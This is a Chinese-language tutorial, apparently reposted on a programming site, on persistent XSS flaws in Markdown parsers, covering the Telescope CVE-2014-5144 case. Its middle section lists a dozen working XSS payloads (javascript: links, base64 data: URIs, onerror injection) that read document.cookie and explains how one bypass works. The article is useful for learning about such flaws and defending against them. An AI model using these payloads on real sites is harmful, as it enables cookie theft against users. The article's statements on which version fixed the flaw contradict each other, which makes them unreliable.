如何分析markdown解析器的持久型XSS漏洞,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。什么是Markdown?Markdown是一种轻量级的标记语言,流
如何分析markdown解析器的持久型XSS漏洞,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
什么是Markdown?
Markdown是一种轻量级的标记语言,流行程度已经得到了GitHub和Stack Overflow的广泛支持,作为普通人我们也可以轻松上手。
用markdown来写文章非常赞,那些琐碎的html标签都可以抛到脑后不用管。最近5年内,markdown收到非常多的关注,包括Reddit,github,StackOverflow在内的很多应用都使用 markdown这也催生了很多的markdown解析器的产生,这里定义了一些markdown语法,语法约定markdown解析器将这些标签解析为html标签。
Markdown安全现状
Markdown解析器的安全现状如何?有没有对用户输入的数据做过滤?
事实上,很多markdown解析器都没有过滤用户输入的数据,那么如果markdown被用于添加用户评论等功能的时候,就有可能存在安全风险。
这里有一些关于这个问题的讨论:[1], [2], [3].
另外,如果用Googe搜索一下:
markdown xss issue site:github.com
你就会发现github上又很多***很高的项目都被发现存在XSS 漏洞。
所以,如何构造一些payload呢?看下面这些:
[a](javascript:prompt(document.cookie))[a](j a v a s c r i p t:prompt(document.cookie))![a](javascript:prompt(document.cookie))\<javascript:prompt(document.cookie)> <javascript:alert('XSS')> ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)[a](javascript:alert('XSS'))![a'"`onerror=prompt(document.cookie)](x)\[citelol]: (javascript:prompt(document.cookie))[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[test](javascript://%0d%0aprompt(1))[test](javascript://%0d%0aprompt(1);com)
上面这些payload是由Aleksa和原文作者一起搞出来的。在过去的12个月内,在实际渗透测试中证明,上面的这些 payload 是有效的。并且很多 markdown 解析器都受到影响。来看一下***一个payload:
[test](javascript://%0d%0aprompt(1);com)
我们猜测,markdown 解析器可能通过如下几个步骤来进行解析&转换:
判断时候有协议头?//有javascript 伪协议,Y
hostname 是以常见的域名后缀(com, org)结尾的?//是的,以 com 结尾 Y
将上述 payload 转换为 HTML 标签,//结果如下
<a href="javascript://%0d%0aprompt(1);com>test</a>
成功构造了一个XSS payload!当点击了上述链接后,就会触发XSS!
Telescope解析器一个持久性 XSS 漏洞(CVE-2014-5144)
Telescope是一个有名的开源项目,类似Reddit和Hackernews一样,提供一个社区功能。Telescope的一个解析帖子&评论的功能存在 XSS 漏洞,并且这个功能存在很久了!
在0.9.3之前的版本中,以上面的 payload 列表中的 payload 发帖或者发表评论,就可以导致一个XSS漏洞。该漏洞已经修复,Telescope在这里发了changelog:Http://www.telesc.pe/blog/telescope-v093-dailyscope/
下面是漏洞对应的payload:
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
注意:上述漏洞已经在Telescope >= 0.7.3版本中修复了。
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注编程网精选频道,感谢您对编程网的支持。
--结束END--
本文标题: 如何分析Markdown解析器的持久型XSS漏洞
本文链接: https://lsjlt.com/news/287673.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-05-24
2024-05-24
2024-05-24
2024-05-24
2024-05-24
2024-05-24
2024-05-24
2024-05-24
2024-05-24
2024-05-24
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0